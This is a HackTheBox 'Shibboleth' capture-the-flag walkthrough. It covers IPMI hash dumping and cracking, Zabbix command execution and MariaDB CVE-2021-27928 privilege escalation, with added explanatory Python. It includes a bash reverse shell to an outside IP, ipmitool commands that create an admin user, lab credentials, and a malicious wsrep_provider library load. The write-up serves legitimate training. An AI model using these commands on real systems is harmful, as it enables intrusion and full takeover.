
[HTB Series] Shibboleth

承影安全团队ChengYingTeam


2024-07-13

0x01 Information Gathering

```
# nmap 10.10.11.124 --min-rate=1000 -sV -sC -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-23 23:32 EST
Nmap scan report for loaclhost (10.10.11.124)
Host is up (0.21s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 84.40 seconds
```

```
10.10.11.124 shibboleth.htb
```

A vhost scan turned up nothing. So let's scan UDP, heh.

```
# nmap -sU -p 623 10.10.11.124
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-13 21:57 EST
Nmap scan report for 10.10.11.124
Host is up (0.50s latency).

PORT    STATE SERVICE
623/udp open  asf-rmcp

Nmap done: 1 IP address (1 host up) scanned in 1.20 seconds
```

One UDP port is open, and the service is **asf-rmcp**.

0x02 Vulnerability Discovery

HackTricks has a detailed description of this service.

In my testing, the IPMI version can be determined with the msf scanner module:

```
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options

Module options (auxiliary/scanner/ipmi/ipmi_version):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256              yes       The number of hosts to probe in each set
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      623              yes       The target port (UDP)
   THREADS    10               yes       The number of concurrent threads

msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhost 10.10.11.124
rhost => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_version) > run

[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The ipmi_dumphashes module can also be used to dump the password hashes:

```
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options

Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):

   Name                  Current Setting                                                    Required  Description
   ----                  ---------------                                                    --------  -----------
   CRACK_COMMON          true                                                               yes       Automatically crack common passwords as they are obtained
   OUTPUT_HASHCAT_FILE                                                                      no        Save captured password hashes in hashcat format
   OUTPUT_JOHN_FILE                                                                         no        Save captured password hashes in john the ripper format
   PASS_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_passwords.txt  yes       File containing common passwords for offline cracking, one per line
   RHOSTS                                                                                   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT                 623                                                                yes       The target port
   SESSION_MAX_ATTEMPTS  5                                                                  yes       Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
   SESSION_RETRY_DELAY   5                                                                  yes       Delay between session retries in seconds
   THREADS               1                                                                  yes       The number of concurrent threads (max one per host)
   USER_FILE             /usr/share/metasploit-framework/data/wordlists/ipmi_users.txt      yes       File containing usernames, one per line

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.10.11.124
rhosts => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:47154804820c0000bc853ff7b9461288b451b6b8a7d227497953d2951254b5672b33551bcaf7f67da123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:77b68095fc39772bcae117e7963cef0dc5f41e3f
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

Crack it with hashcat:

```
└─# hashcat -h | grep ipmi
└─# hashcat -h | grep -i ipmi        # -i makes the match case-insensitive
   7300 | IPMI2 RAKP HMAC-SHA1                             | Network Protocols
└─# hashcat -m 7300 /tmp/1 /usr/share/wordlists/rockyou.txt

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

47154804820c0000bc853ff7b9461288b451b6b8a7d227497953d2951254b5672b33551bcaf7f67da123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:77b68095fc39772bcae117e7963cef0dc5f41e3f:ilovepumkinpie1

Session..........: hashcat
Status...........: Cracked
Hash.Name........: IPMI2 RAKP HMAC-SHA1
Hash.Target......: 47154804820c0000bc853ff7b9461288b451b6b8a7d22749795...f41e3f
Time.Started.....: Mon Dec 13 22:09:58 2021 (3 secs)
Time.Estimated...: Mon Dec 13 22:10:01 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2627.7 kH/s (0.69ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 7397376/14344385 (51.57%)
Rejected.........: 0/7397376 (0.00%)
Restore.Point....: 7393280/14344385 (51.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: iloverobert!!! -> ilovemymum64.

Started: Mon Dec 13 22:09:41 2021
Stopped: Mon Dec 13 22:10:02 2021
```

That gives one set of credentials:

Administrator:ilovepumkinpie1
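Added here to show why the dump above cracks offline (this is not code from the original post, nor from Metasploit or hashcat): it splits the RAKP message 2 fields out of the dumped salt and recomputes the HMAC-SHA1 that hashcat mode 7300 tests, using the hash and password printed above. The field offsets follow Metasploit's hashcat-format output; the role-byte decoding follows the IPMI 2.0 spec.

```python
import hashlib
import hmac

# The hash exactly as ipmi_dumphashes printed it above, in hashcat -m 7300
# form <salt-hex>:<hmac-hex>. The "salt" is the RAKP message 2 payload: the
# BMC signs it with HMAC-SHA1 keyed by the user's password *before* the client
# has proven anything, and every byte of it crosses the wire in the clear.
SALT_HEX = (
    "47154804"                           # remote console session ID
    "820c0000"                           # BMC (managed system) session ID
    "bc853ff7b9461288b451b6b8a7d22749"   # console random number (Rm)
    "7953d2951254b5672b33551bcaf7f67d"   # BMC random number (Rc)
    "a123456789abcdefa123456789abcdef"   # BMC GUID as returned by this BMC
    "14"                                 # requested role byte
    "0d"                                 # username length (13)
    "41646d696e6973747261746f72"         # "Administrator"
)
DUMPED_HASH = SALT_HEX + ":77b68095fc39772bcae117e7963cef0dc5f41e3f"


def decode_rakp_salt(salt_hex):
    """Split the RAKP message 2 fields out of the hashcat salt."""
    b = bytes.fromhex(salt_hex)
    role, ulen = b[56], b[57]
    name = b[58:58 + ulen]
    if len(name) != ulen:
        raise ValueError("salt shorter than the username length claims")
    return {
        "console_sid": b[0:4].hex(),
        "bmc_sid": b[4:8].hex(),
        "console_rand": b[8:24].hex(),
        "bmc_rand": b[24:40].hex(),
        "bmc_guid": b[40:56].hex(),
        "privilege": role & 0x0F,              # 4 = Administrator
        "name_only_lookup": bool(role & 0x10),
        "username": name.decode("ascii"),
    }


def rakp2_hmac(password, salt_hex):
    """HMAC-SHA1 keyed by the password over the cleartext RAKP 2 fields."""
    return hmac.new(password.encode(), bytes.fromhex(salt_hex),
                    hashlib.sha1).hexdigest()


def password_matches(password, dumped):
    """True if `password` is the key that produced the dumped HMAC."""
    salt_hex, expected = dumped.split(":")
    return hmac.compare_digest(rakp2_hmac(password, salt_hex), expected)
```

Since the only secret input to the HMAC is the password, a BMC reachable on UDP 623 hands any unauthenticated client an offline-crackable hash for any valid username; the fix is to keep IPMI off untrusted networks rather than to rely on the protocol.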

With this access you can also add a user (and seemingly set its privilege level, not sure whether that helps), which could be used for SSH login. But there is no SSH, so no login that way.

```
apt install ipmitool
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user set name 3 hehe
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user set password 3 hehe
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user priv 3 4
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user enable 3
└─# ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P ilovepumkinpie1 user list
ID  Name             Callin  Link Auth  IPMI Msg  Channel Priv Limit
1                    true    false      false     USER
2   Administrator    true    false      true      USER
3   hehe             true    false      true      USER
```

Then I felt stuck. With no better idea I ran a vhost scan and found three subdomains. Visiting them shows a login page.

mail.shibboleth.htb  
monitor.shibboleth.htb  
zabbix.shibboleth.htb

The credentials log in successfully. The version is fairly recent, 5.0.17, and there are no public vulnerabilities for it. A directory scan, shown below, finds nothing critical.

```
Target: http://zabbix.shibboleth.htb/

[09:07:44] Starting:
[09:07:57] 301 -  327B  - /js  ->  http://zabbix.shibboleth.htb/js/
[09:11:11] 301 -  328B  - /app  ->  http://zabbix.shibboleth.htb/app/
[09:11:16] 301 -  331B  - /assets  ->  http://zabbix.shibboleth.htb/assets/
[09:11:16] 403 -  286B  - /assets/
[09:11:17] 301 -  330B  - /audio  ->  http://zabbix.shibboleth.htb/audio/
[09:11:41] 301 -  329B  - /conf  ->  http://zabbix.shibboleth.htb/conf/
[09:11:42] 403 -  286B  - /conf/
[09:12:20] 301 -  330B  - /fonts  ->  http://zabbix.shibboleth.htb/fonts/
[09:12:24] 200 -   32KB - /favicon.ico
[09:12:37] 200 -    2KB - /image.php
[09:12:40] 301 -  332B  - /include  ->  http://zabbix.shibboleth.htb/include/
[09:12:40] 403 -  286B  - /include/
[09:12:47] 500 -    0B  - /include/config.inc.php
[09:13:01] 403 -  286B  - /js/
[09:13:11] 301 -  330B  - /local  ->  http://zabbix.shibboleth.htb/local/
[09:13:14] 403 -  286B  - /local/
[09:13:24] 200 -    2KB - /maintenance.php
[09:13:26] 200 -    2KB - /map.php
[09:13:36] 403 -  286B  - /modules/
[09:13:36] 301 -  332B  - /modules  ->  http://zabbix.shibboleth.htb/modules/
[09:14:30] 200 -  974B  - /robots.txt
[09:14:37] 403 -  286B  - /server-status/
[09:14:37] 403 -  286B  - /server-status
[09:14:42] 200 -    2KB - /setup.php
[09:15:19] 403 -  286B  - /vendor/
```

Some research shows that Zabbix has an item key parameter that allows command execution.

Found it.

Try creating an item.

So our payload is:

```
system.run["/bin/bash -i >& /dev/tcp/10.10.14.50/4444 0>&1",nowait]
```

Then click the TEST button. After reading a lot of material, it turns out this spot is fairly restricted: the method is not enabled by default.
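As an added defender-side check (not code from the original post or from Zabbix), the following evaluates the Zabbix 5.0 agent's AllowKey/DenyKey rules against a constructed zabbix_agentd.conf to tell whether an arbitrary system.run[...] item would be executed. It assumes the documented first-match-wins ordering with unmatched keys allowed, treats `*` as the only wildcard (a simplification of the agent's matcher), and does not model the deprecated EnableRemoteCommands directive.

```python
import re

# Constructed zabbix_agentd.conf fragment for this check (not the box's file).
SAMPLE_CONF = """\
Server=127.0.0.1
ServerActive=127.0.0.1
Hostname=shibboleth
# one maintenance script may run; everything else under system.run is refused
AllowKey=system.run[/usr/local/bin/backup.sh]
DenyKey=system.run[*]
"""


def parse_key_rules(conf_text):
    """Return (directive, pattern) rules in file order, skipping comments."""
    rules = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, value = line.partition("=")
        if sep and name.strip() in ("AllowKey", "DenyKey"):
            rules.append((name.strip(), value.strip()))
    return rules


def _pattern_re(pattern):
    # Assumption (simplified): '*' matches any run of characters; brackets,
    # dots and everything else in the pattern are literal.
    return re.compile("^" + re.escape(pattern).replace(r"\*", ".*") + "$")


def key_allowed(item_key, rules):
    """Rules are checked in order; first match wins; no match means allowed."""
    for directive, pattern in rules:
        if _pattern_re(pattern).match(item_key):
            return directive == "AllowKey"
    return True


def system_run_exposed(conf_text):
    """True if an arbitrary system.run[...] item would be executed."""
    # A harmless probe key stands in for whatever a server operator submits.
    return key_allowed("system.run[id]", parse_key_rules(conf_text))
```

A config with no DenyKey for system.run at all reports as exposed, which is the state a Zabbix web login like the one above turns into code execution on the agent host.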

0x03 Privilege Escalation

```
cat /etc/passwd | grep -v nologin | grep -v false   # -v excludes matching lines
root:x:0:0:root:/root:/bin/bash
sync:x:4:65534:sync:/bin:/bin/sync
ipmi-svc:x:1000:1000:ipmi-svc,,,:/home/ipmi-svc:/bin/bash
```

Trying to read the flag fails with permission denied:

```
-rw-r----- 1 ipmi-svc ipmi-svc 33 Dec 14 07:01 /home/ipmi-svc/user.txt
```

Port 3306 is listening locally:

```
zabbix@shibboleth:/tmp$ netstat -ant
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:10050           0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:10051           0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN
tcp        0     13 10.10.11.124:51748      10.10.14.50:4444        ESTABLISHED
tcp        0      1 10.10.11.124:35144      1.1.1.1:53              SYN_SENT
tcp6       0      0 :::10050                :::*                    LISTEN
tcp6       0      0 :::10051                :::*                    LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
tcp6       0      0 ::1:10051               ::1:45644               TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45332       TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45340       TIME_WAIT
tcp6       0      0 ::1:10051               ::1:45604               TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45344       ESTABLISHED
tcp6       0      0 10.10.11.124:80         10.10.14.50:45336       TIME_WAIT
tcp6       0      0 ::1:10051               ::1:45612               TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45342       TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45334       TIME_WAIT
tcp6       0      0 ::1:10051               ::1:45558               TIME_WAIT
tcp6       0      0 10.10.11.124:80         10.10.14.50:45330       TIME_WAIT
tcp6       0      0 ::1:10051               ::1:45586               TIME_WAIT
tcp6       0      0 ::1:10051               ::1:45596               TIME_WAIT
```

```
[-] MYSQL version:
mysql  Ver 15.1 Distrib 10.3.25-MariaDB, for debian-linux-gnu (x86_64) using readline 5.2
```

A search turns up a freshly published one. The affected versions are:

```
MariaDB 10.2 before 10.2.37
        10.3 before 10.3.28
        10.4 before 10.4.18
        10.5 before 10.5.9
```

https://github.com/Al1ex/CVE-2021-27928

Looking at the zabbix config files, we have no permission to read the server config:

```
drwxr-xr-x  4 root     root      4096 Nov  8 11:02 .
drwxr-xr-x 96 root     root      4096 Nov  8 11:02 ..
-r--------  1 zabbix   zabbix      33 Apr 24  2021 peeesskay.psk
drwxr-xr-x  2 www-data root      4096 Apr 27  2021 web
-rw-r--r--  1 root     root     15317 May 25  2021 zabbix_agentd.conf
-rw-r--r--  1 root     root     15574 Oct 18 09:24 zabbix_agentd.conf.dpkg-dist
drwxr-xr-x  2 root     root      4096 Apr 27  2021 zabbix_agentd.d
-rw-r-----  1 root     ipmi-svc 21863 Apr 24  2021 zabbix_server.conf
-rw-r-----  1 root     ipmi-svc 22306 Oct 18 09:24 zabbix_server.conf.dpkg-dist
```

No password to be found there. I tried su with weak passwords, many attempts, none worked.

Then I thought of the password from above, and it worked:

```
ipmi-svc@shibboleth:/home$ id
uid=1000(ipmi-svc) gid=1000(ipmi-svc) groups=1000(ipmi-svc)
```

I didn't find any relevant information leakage, so I used:

```
ipmi-svc@shibboleth:/home$ grep -iR passw /etc/
grep: /etc/at.deny: Permission denied
/etc/zabbix/zabbix_agentd.conf:#        Alias=zabbix.userid:vfs.file.regexp[/etc/passwd,^zabbix:.:([0-9]+),,,,\1]
/etc/zabbix/zabbix_server.conf.dpkg-dist:### Option: DBPassword
/etc/zabbix/zabbix_server.conf.dpkg-dist:#      Database password.
/etc/zabbix/zabbix_server.conf.dpkg-dist:#      Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf.dpkg-dist:# DBPassword=
/etc/zabbix/zabbix_server.conf:### Option: DBPassword
/etc/zabbix/zabbix_server.conf:#        Database password.
/etc/zabbix/zabbix_server.conf:#        Comment this line if no password is used.
/etc/zabbix/zabbix_server.conf:DBPassword=bloooarskybluh
```

The password is in /etc/zabbix/zabbix_server.conf; reading that file also gives the database name:

```
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
```

MySQL: `mysql -u zabbix -pbloooarskybluh` connects successfully.

```
ps aux | grep mysql
root       31066  0.0  0.0   2608  1704 ?        S    10:22   0:00 /bin/sh /usr/bin/mysqld_safe
root       31189  0.7  2.9 1740284 118544 ?      Sl   10:22   0:06 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/x86_64-linux-gnu/mariadb19/plugin --user=root --skip-log-error --pid-file=/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock
root       31190  0.0  0.0  10572  1064 ?        S    10:22   0:00 logger -t mysqld -p daemon error
zabbix     33567  0.0  0.0   9036   736 ?        S    10:37   0:00 grep mysql
```

Database access + CVE-2021-27928 (mysqld started as root + command injection) = root privileges.

```
mysql -u zabbix -p -h 127.0.0.1 -e 'SET GLOBAL wsrep_provider="/tmp/backdoor.so.1";'
```

Generate a reverse-shell .so file, upload it, trigger the load, and root is obtained.
